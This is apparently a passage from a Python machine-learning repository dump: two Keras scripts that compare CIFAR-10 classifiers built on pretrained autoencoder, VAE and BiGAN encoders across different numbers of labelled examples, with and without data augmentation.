sample_images(image_path, epoch, imgs) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,490 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_classifier_comparison.py | import keras
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from cifar10_models import deterministic_encoder_model, vae_encoder_model
from common_models.classifier_models import classifier_e_trainable_model, classifier_e_frozen_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_cifar10
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
model_path = 'Models/cifar10'
results_path = 'Results/cifar10'
# =====================================
# Load data
# =====================================
# Load pre-processed CIFAR10 data
(X_train, y_train), (X_test, y_test) = get_cifar10()
# Label data is same for both
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
# =====================================
# Instantiate models
# =====================================
# Load encoders
basic_ae = deterministic_encoder_model()
dae = deterministic_encoder_model()
aae = deterministic_encoder_model()
vae_encoder = vae_encoder_model()
bigan = deterministic_encoder_model()
# Load saved weights
basic_ae.load_weights(model_path + '_basic_ae_encoder.h5')
dae.load_weights(model_path + '_dae_encoder.h5')
aae.load_weights(model_path + '_aae_encoder.h5')
vae_encoder.load_weights(model_path + '_vae_encoder.h5')
vae = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, 0.05)
bigan.load_weights(model_path + '_bigan_determ_encoder.h5')
# Freeze the parameters of all encoders
basic_ae.trainable = False
dae.trainable = False
aae.trainable = False
vae.trainable = False
bigan.trainable = False
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
val_split = 1/5.
patience = 10
# Specify optimizer for classifier training
optimizer = keras.optimizers.Adadelta()
# Specify training stop criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
# Number of random initializations of FC layers for each value in num_unlabelled
num_initializations = 5
# Arrays to hold accuracy of classifiers
classifier1_acc = np.zeros(len(num_unlabelled))
classifier2_acc = np.zeros(len(num_unlabelled))
classifier3_acc = np.zeros(len(num_unlabelled))
classifier4_acc = np.zeros(len(num_unlabelled))
classifier5_acc = np.zeros(len(num_unlabelled))
classifier6_acc = np.zeros(len(num_unlabelled))
# Train classifiers for each number of unlabeled examples
for index, num in enumerate(num_unlabelled):
# Reset classifier scores to zero
classifier1_score = 0
classifier2_score = 0
classifier3_score = 0
classifier4_score = 0
classifier5_score = 0
classifier6_score = 0
# Reduce size of training sets
reduced_x_train = X_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy over num_iterations readings
for initialization in range(num_initializations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(initialization+1) + '/' + str(num_initializations))
# Instantiate classfiers to be trained
classifier1 = classifier_e_frozen_model(basic_ae)
classifier2 = classifier_e_frozen_model(dae)
classifier3 = classifier_e_frozen_model(aae)
classifier4 = classifier_e_frozen_model(vae)
classifier5 = classifier_e_frozen_model(bigan)
cnn = deterministic_encoder_model()
classifier6 = classifier_e_trainable_model(cnn)
# Compile models
for classifier in (classifier1, classifier2, classifier3, classifier4, classifier5, classifier6):
classifier.compile(loss=keras.losses.categorical_crossentropy,
optimizer=optimizer,
metrics=['accuracy'])
# =====================================
# Train classifiers
# =====================================
# Classifier 1
model_checkpoint = ModelCheckpoint(model_path + '_classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier1.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier1.load_weights(model_path + '_classifier_1.h5')
score = classifier1.evaluate(X_test, y_test_one_hot, verbose=0)
classifier1_score += score[1]
# Classifier 2
model_checkpoint = ModelCheckpoint(model_path + '_classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier2.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier2.load_weights(model_path + '_classifier_2.h5')
score = classifier2.evaluate(X_test, y_test_one_hot, verbose=0)
classifier2_score += score[1]
# Classifier 3
model_checkpoint = ModelCheckpoint(model_path + '_classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier3.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier3.load_weights(model_path + '_classifier_3.h5')
score = classifier3.evaluate(X_test, y_test_one_hot, verbose=0)
classifier3_score += score[1]
# Classifier 4
model_checkpoint = ModelCheckpoint(model_path + '_classifier_4.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier4.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier4.load_weights(model_path + '_classifier_4.h5')
score = classifier4.evaluate(X_test, y_test_one_hot, verbose=0)
classifier4_score += score[1]
# Classifier 5
model_checkpoint = ModelCheckpoint(model_path + '_classifier_5.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier5.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier5.load_weights(model_path + '_classifier_5.h5')
score = classifier5.evaluate(X_test, y_test_one_hot, verbose=0)
classifier5_score += score[1]
# Classifier 6
model_checkpoint = ModelCheckpoint(model_path + '_classifier_6.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier6.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier6.load_weights(model_path + '_classifier_6.h5')
score = classifier6.evaluate(X_test, y_test_one_hot, verbose=0)
classifier6_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier1_acc[index] = 100 * classifier1_score / num_initializations
classifier2_acc[index] = 100 * classifier2_score / num_initializations
classifier3_acc[index] = 100 * classifier3_score / num_initializations
classifier4_acc[index] = 100 * classifier4_score / num_initializations
classifier5_acc[index] = 100 * classifier5_score / num_initializations
classifier6_acc[index] = 100 * classifier6_score / num_initializations
# Save results for all classifiers to file
np.savetxt('Results/classifier1.txt', classifier1_acc, fmt='%f')
np.savetxt('Results/classifier2.txt', classifier2_acc, fmt='%f')
np.savetxt('Results/classifier3.txt', classifier3_acc, fmt='%f')
np.savetxt('Results/classifier4.txt', classifier4_acc, fmt='%f')
np.savetxt('Results/classifier5.txt', classifier5_acc, fmt='%f')
np.savetxt('Results/classifier6.txt', classifier6_acc, fmt='%f')
# Print accuracies
print(classifier1_acc)
print(classifier2_acc)
print(classifier3_acc)
print(classifier4_acc)
print(classifier5_acc)
print(classifier6_acc) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,491 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/augmentation/cifar10_bigan_aug_comparison.py | import keras
from keras import backend as K
import numpy as np
import matplotlib.pyplot as plt
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from train_models.cifar10_cnn.cifar10_models import deterministic_encoder_model
from functions.data_funcs import get_cifar10
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# Number of labelled examples to investigate
num_unlabelled = [200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
num_iterations = 5
num_classes = 10
# Path that containes pre-trained encoder
pretrained_encoder_path = 'cifar10_bigan_determ_encoder.h5'
# Paths to hold classifier models
classifier_pretrained_path = 'cifar10_pretrained_classifier.h5'
classifier_pretrained_aug_path = 'cifar10_pretrained_aug_classifier.h5'
classifier_random_path = 'cifar10_random.h5'
classifier_random_aug_path = 'cifar10_random_aug.h5'
# =====================================
# Load data
# =====================================
(X_train, y_train), (X_test, y_test) = get_cifar10()
y_train_one_hot = keras.utils.to_categorical(y_train, num_classes)
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# =====================================
# Define augmentation
# =====================================
datagen = ImageDataGenerator(rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# =====================================
# Instantiate models
# =====================================
# Load frozen pretrained encoder model
pretrained_e = deterministic_encoder_model()
pretrained_e_one_layer_trainable = deterministic_encoder_model()
pretrained_e_trainable = deterministic_encoder_model()
# Load weights
pretrained_e.load_weights(pretrained_encoder_path)
# =====================================
# Training details
# =====================================
# Hyper-parameters and training specification for both models
epochs = 100
aug_epochs = 50
batch_size = 128
val_split = 1/5.
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Arrays to hold accuracy of classifiers
classifier_pretrained_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_aug_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_lastconv_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_lastconv_aug_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
classifier_random_aug_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_aug_acc = np.zeros(len(num_unlabelled))
# =====================================
# Train models
# =====================================
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
# Set each score to zero
pretrained_score = 0
pretrained_aug_score = 0
pretrained_lastconv_score = 0
pretrained_lastconv_aug_score = 0
random_score = 0
random_aug_score = 0
pretrained_trainable_score = 0
pretrained_trainable_aug_score = 0
# Reduce size of training sets
reduced_x_train = X_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# fit the dataget
datagen.fit(reduced_x_train)
# Average classification accuracy a number of random initializations
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
# ----------------------------
# Instantiate classifiers
# ----------------------------
# Classifiers with encoder learned from autoencoder and frozen
classifier_pretrained = classifier_e_frozen_model(pretrained_e)
classifier_pretrained_aug = classifier_e_frozen_model(pretrained_e)
# Classifiers with encoder learned from autoencoder and frozen (except last conv layer)
pretrained_e_one_layer_trainable.load_weights(pretrained_encoder_path)
# Set all layers to be non-trainable except last conv
classifier_pretrained_lastconv = classifier_e_trainable_model(pretrained_e_one_layer_trainable)
classifier_pretrained_lastconv_aug = classifier_e_trainable_model(pretrained_e_one_layer_trainable)
for i, layer in enumerate(pretrained_e_one_layer_trainable.layers):
if i != 17:
if i != 19:
layer.trainable = False
# Classifier with randomly initialized encoder
random_e = deterministic_encoder_model()
classifier_random = classifier_e_trainable_model(random_e)
classifier_random_aug = classifier_e_trainable_model(random_e)
# Classifier with trainable pre-trained encoder
pretrained_e_trainable.load_weights(pretrained_encoder_path)
classifier_pretrained_trainable = classifier_e_trainable_model(pretrained_e_trainable)
classifier_pretrained_trainable_aug = classifier_e_trainable_model(pretrained_e_trainable)
# ----------------------------
# Inspect trainable weights
# ----------------------------
# Print details of trainable and non-trainable weights of models
if index == 0 and iteration == 0:
# Print number of trainable and non-trainable parameters for each classifier
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained.non_trainable_weights)]))
print('\nClassifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_aug.non_trainable_weights)]))
print('\nClassifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_lastconv_aug.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_random_aug.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable.non_trainable_weights)]))
print('\nClassifier w/ Fully Trainable Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable_aug.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(classifier_pretrained_trainable_aug.non_trainable_weights)]))
print('\nClassifier w/ Fully Trainable Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
# ----------------------------
# Compile models
# ----------------------------
classifier_pretrained.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_lastconv.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_lastconv_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_random.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_random_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_trainable.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
classifier_pretrained_trainable_aug.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# ----------------------------
# Train classifiers
# ----------------------------
# Train classifier with frozen pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained.load_weights('classifier_1.h5')
score = classifier_pretrained.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_aug.load_weights('classifier_1.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0]//batch_size)
classifier_pretrained_aug.save_weights('classifier_2.h5')
score = classifier_pretrained_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_aug_score += score[1]
# Train classifier with frozen pretrained encoder (last conv layer trainable)
model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained_lastconv.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained_lastconv.load_weights('classifier_3.h5')
score = classifier_pretrained_lastconv.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_lastconv_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_lastconv_aug.load_weights('classifier_3.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_lastconv_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0] // batch_size)
classifier_pretrained_lastconv_aug.save_weights('classifier_4.h5')
score = classifier_pretrained_lastconv_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_lastconv_aug_score += score[1]
# Train classifier with randomly initialized encoder
model_checkpoint = ModelCheckpoint('classifier_5.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_random.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
shuffle=True,
validation_split=val_split)
classifier_random.load_weights('classifier_5.h5')
score = classifier_random.evaluate(X_test, y_test_one_hot, verbose=0)
random_score += score[1]
# Train previous classifier with augmentation
classifier_random_aug.load_weights('classifier_5.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_random_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0]//batch_size)
classifier_random_aug.save_weights('classifier_6.h5')
score = classifier_random_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
random_aug_score += score[1]
# Train classifier with frozen pretrained encoder (last conv layer trainable)
model_checkpoint = ModelCheckpoint('classifier_7.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier_pretrained_trainable.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier_pretrained_trainable.load_weights('classifier_7.h5')
score = classifier_pretrained_trainable.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_trainable_score += score[1]
# Train previous classifier with augmentation
classifier_pretrained_trainable_aug.load_weights('classifier_7.h5')
train_batches = datagen.flow(reduced_x_train, reduced_y_train, batch_size=batch_size)
classifier_pretrained_trainable_aug.fit_generator(train_batches,
epochs=aug_epochs,
steps_per_epoch=reduced_x_train.shape[0] // batch_size)
classifier_pretrained_trainable_aug.save_weights('classifier_8.h5')
score = classifier_pretrained_trainable_aug.evaluate(X_test, y_test_one_hot, batch_size=batch_size, verbose=1)
pretrained_trainable_aug_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_acc[index] = 100 * pretrained_score / num_iterations
classifier_pretrained_aug_acc[index] = 100 * pretrained_aug_score / num_iterations
classifier_pretrained_lastconv_acc[index] = 100 * pretrained_lastconv_score / num_iterations
classifier_pretrained_lastconv_aug_acc[index] = 100 * pretrained_lastconv_aug_score / num_iterations
classifier_random_acc[index] = 100 * random_score / num_iterations
classifier_random_aug_acc[index] = 100 * random_aug_score / num_iterations
classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
classifier_pretrained_trainable_aug_acc[index] = 100 * pretrained_trainable_aug_score / num_iterations
# Save results to file
np.savetxt('Results/classifier1.txt', classifier_pretrained_acc, fmt='%f')
np.savetxt('Results/classifier2.txt', classifier_pretrained_aug_acc, fmt='%f')
np.savetxt('Results/classifier3.txt', classifier_pretrained_lastconv_acc, fmt='%f')
np.savetxt('Results/classifier4.txt', classifier_pretrained_lastconv_aug_acc, fmt='%f')
np.savetxt('Results/classifier5.txt', classifier_random_acc, fmt='%f')
np.savetxt('Results/classifier6.txt', classifier_random_aug_acc, fmt='%f')
np.savetxt('Results/classifier7.txt', classifier_pretrained_trainable_acc, fmt='%f')
np.savetxt('Results/classifier8.txt', classifier_pretrained_trainable_aug_acc, fmt='%f')
# =====================================
# Visualize results
# =====================================
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_pretrained_aug_acc,
'-o', num_unlabelled, classifier_random_aug_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder + No Augmentation', 'BiGAN Encoder + Augmentation',
'Randomly Initialized Encoder + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_bigan_aug_compar.png')
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_pretrained_aug_acc,
'-o', num_unlabelled, classifier_pretrained_lastconv_acc, '-o', num_unlabelled, classifier_pretrained_lastconv_aug_acc, '-o',
num_unlabelled, classifier_pretrained_trainable_acc, '-o', num_unlabelled, classifier_pretrained_trainable_aug_acc, '-o',
num_unlabelled, classifier_random_aug_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen + No Augmentation', 'Frozen + Augmentation', 'Last Conv Trainable + No Augmentation',
'Last Conv Trainable + Augmentation', 'Fully Trainable + No Augmentation', 'Fully Trainable + Augmentation',
'Randomly Initialized Encoder + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_bigan_aug_trainable_compar.png')
# Plot comparison graph
plt.figure()
